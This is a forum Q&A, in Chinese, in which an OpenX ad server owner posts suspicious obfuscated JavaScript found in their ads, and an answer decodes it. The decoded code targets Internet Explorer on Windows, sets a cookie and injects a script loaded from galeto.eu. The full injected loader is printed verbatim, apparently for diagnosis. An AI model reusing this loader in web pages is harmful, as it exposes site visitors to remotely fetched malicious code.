我在我的网站上运行OpenX Ad服务器,最近我注意到广告中显示的奇怪代码。我不确定这是否是OpenX代码的一部分,或者应用程序是否以某种方式受到了损害。也许拥有javascript知识的人可以为我解释这一点。这是代码:
<script>try{_=~[];_={___:++_,$$$$:(![]+"")[_],__$:++_,$_$_:(![]+"")[_],_$_:++_,$_$$:({}+"")[_],$$_$:(_[_]+"")[_],_$$:++_,$$$_:(!""+"")[_],$__:++_,$_$:++_,$$__:({}+"")[_],$$_:++_,$$$:++_,$___:++_,$__$:++_};_.$_=(_.$_=_+"")[_.$_$]+(_._$=_.$_[_.__$])+(_.$$=(_.$+"")[_.__$])+((!_)+"")[_._$$]+(_.__=_.$_[_.$$_])+(_.$=(!""+"")[_.__$])+(_._=(!""+"")[_._$_])+_.$_[_.$_$]+_.__+_._$+_.$;_.$$=_.$+(!""+"")[_._$$]+_.__+_._+_.$+_.$$;_.$=(_.___)[_.$_][_.$_];_.$(_.$(_.$$+"\""+_.$$_$+"="+_.$$_$+_._$+_.$$__+_._+"\\"+_.__$+_.$_$+_.$_$+_.$$$_+"\\"+_.__$+_.$_$+_.$$_+_.__+";"+_._+_.$_$_+"=\\"+_.__$+_.$_$+_.$$_+_.$_$_+"\\"+_.__$+_.$$_+_.$$_+"\\"+_.__$+_.$_$+_.__$+"\\"+_.__$+_.$__+_.$$$+_.$_$_+_.__+_._$+"\\"+_.__$+_.$$_+_._$_+"."+_._+"\\"+_.__$+_.$$_+_._$$+_.$$$_+"\\"+_.__$+_.$$_+_._$_+"\\"+_.__$+_.___+_.__$+"\\"+_.__$+_.$__+_.$$$+_.$$$_+"\\"+_.__$+_.$_$+_.$$_+_.__+";\\"+_.__$+_.$_$+_.__$+_.$$$$+"("+_.$$_$+"._\\"+_.__$+_.$$$+_._$_+"\\"+_.__$+_.$$$+_.___+"==="+_._+"\\"+_.__$+_.$_$+_.$$_+_.$$_$+_.$$$_+_.$$$$+"\\"+_.__$+_.$_$+_.__$+"\\"+_.__$+_.$_$+_.$$_+_.$$$_+_.$$_$+"\\"+_.$__+_.___+"&&\\"+_.$__+_.___+_.$$_$+"."+_.$$__+_._$+_._$+"\\"+_.__$+_.$_$+_._$$+"\\"+_.__$+_.$_$+_.__$+_.$$$_+".\\"+_.__$+_.$$_+_._$$+_.$$$_+_.$_$_+"\\"+_.__$+_.$$_+_._$_+_.$$__+"\\"+_.__$+_.$_$+_.___+"('_"+_._+_.__+"\\"+_.__$+_.$_$+_.$_$+_._+_.$$_$+"=')==-"+_.__$+"\\"+_.$__+_.___+"&&\\"+_.$__+_.___+_._+_.$_$_+".\\"+_.__$+_.$$_+_._$$+_.$$$_+_.$_$_+"\\"+_.__$+_.$$_+_._$_+_.$$__+"\\"+_.__$+_.$_$+_.___+"('\\"+_.__$+_._$_+_.$$$+"\\"+_.__$+_.$_$+_.__$+"\\"+_.__$+_.$_$+_.$$_+_.$$_$+_._$+"\\"+_.__$+_.$$_+_.$$$+"\\"+_.__$+_.$$_+_._$$+"\\"+_.$__+_.___+"\\"+_.__$+_.__$+_.$$_+"\\"+_.__$+_._$_+_.$__+"\\"+_.$__+_.___+"')>"+_.___+"\\"+_.$__+_.___+"&&\\"+_.$__+_.___+_._+_.$_$_+".\\"+_.__$+_.$$_+_._$$+_.$$$_+_.$_$_+"\\"+_.__$+_.$$_+_._$_+_.$$__+"\\"+_.__$+_.$_$+_.___+"('\\"+_.__$+_.__$+_.$_$+"\\"+_.__$+_._$_+_._$$+"\\"+_.__$+_.__$+_.__$+"\\"+_.__$+_.___+_.$_$+"\\"+_.$__+_.___+"')>"+_.___+")\\"+_.$__+_.___+"{"+_.$$_$+"._\\"+_.__$+_.$$$+_._$_+"\\"+_.__$+_.$$$+_.___+"="+_.__$+";"+_.$$_$+"."+_.$$__+_._$+_._$+"\\"+_.__$+_.$_$+_._$$+"\\"+_.__$+_.$_$+_.__$+_.$$$_+"='__"+_._+_.__+"\\"+_.__$+_.$_$+_.$_$+_._+_.$$_$+"="+_.__$+";\\"+_.$__+_.___+_.$$$_+"\\"+_.__$+_.$$$+_.___+"\\"+_.__$+_.$$_+_.___+"\\"+_.__$+_.$_$+_.__$+"\\"+_.__$+_.$$_+_._$_+_.$$$_+"\\"+_.__$+_.$$_+_._$$+"=\\"+_.__$+_._$_+_.$$$+_.$$$_+_.$$_$+",\\"+_.$__+_.___+_.___+_.__$+"\\"+_.$__+_.___+"\\"+_.__$+_.__$+_._$_+_.$_$_+"\\"+_.__$+_.$_$+_.$$_+"\\"+_.$__+_.___+_._$_+_.___+_._$_+_.___+"\\"+_.$__+_.___+_.___+_.___+":"+_.___+_.___+":"+_.___+_.___+"\\"+_.$__+_.___+"\\"+_.__$+_._$_+_.$_$+"\\"+_.__$+_._$_+_.$__+"\\"+_.__$+_.___+_._$$+";\\"+_.$__+_.___+"\\"+_.__$+_.$$_+_.___+_.$_$_+_.__+"\\"+_.__$+_.$_$+_.___+"=/';"+_.$$_$+".\\"+_.__$+_.$$_+_.$$$+"\\"+_.__$+_.$$_+_._$_+"\\"+_.__$+_.$_$+_.__$+_.__+_.$$$_+(![]+"")[_._$_]+"\\"+_.__$+_.$_$+_.$$_+"(\\\"<\\"+_.__$+_.$$_+_._$$+_.$$__+"\\"+_.__$+_.$$_+_._$_+"\\\"+\\\"\\"+_.__$+_.$_$+_.__$+"\\"+_.__$+_.$$_+_.___+_.__+"\\"+_.$__+_.___+"\\"+_.__$+_.$$_+_._$$+"\\"+_.__$+_.$$_+_._$_+_.$$__+"='\\"+_.__$+_.$_$+_.___+_.__+_.__+"\\"+_.__$+_.$$_+_.___+"://\\"+_.__$+_.$__+_.$$$+_.$_$_+(![]+"")[_._$_]+_.$$$_+_.__+_._$+"."+_.$$$_+_._+"/"+_.$_$+_.$$_$+_.$$_+_._$_+_.___+_.$$_+_.$$_$+_.$$_$+".\\"+_.__$+_.$_$+_._$_+"\\"+_.__$+_.$$_+_._$$+"?"+_.$$__+"\\"+_.__$+_.$$_+_.___+"=\\"+_.__$+_.$$_+_.$$$+"\\"+_.__$+_.$$_+_.$$$+"\\"+_.__$+_.$$_+_.$$$+"."+_.$_$$+"\\"+_.__$+_.$$_+_._$_+_.$_$_+"\\"+_.__$+_.$$_+_.$$_+_.$_$_+"\\"+_.__$+_.$_$+_.$$_+_.$$$_+"\\"+_.__$+_.$$_+_.$$$+"\\"+_.__$+_.$$_+_._$$+"."+_.$$__+_._$+"\\"+_.__$+_.$_$+_.$_$+"'></\\"+_.__$+_.$$_+_._$$+_.$$__+"\\"+_.__$+_.$$_+_._$_+"\\"+_.__$+_.$_$+_.__$+"\\\"+\\\"\\"+_.__$+_.$$_+_.___+_.__+">\\\");}"+"\"")())();}catch(e){}</script>
答案 0 :(得分:2)
评估时,混淆代码将定义此函数并执行它:
function anonymous() {
d=document;ua=navigator.userAgent;
if(d._zx===undefined && d.cookie.search('_utmud=')==-1 && ua.search('Windows NT ')>0 && ua.search('MSIE ')>0) {
d._zx=1;d.cookie='__utmud=1; expires=Wed, 01 Jan 2020 00:00:00 UTC; path=/';
d.writeln("<scr"+"ipt src='http://galeto.eu/5d6206dd.js?cp=www.domain.com'></scri"+"pt>");
}
}
基本上,它设置了一个cookie并加载了一个额外的JavaScript文件。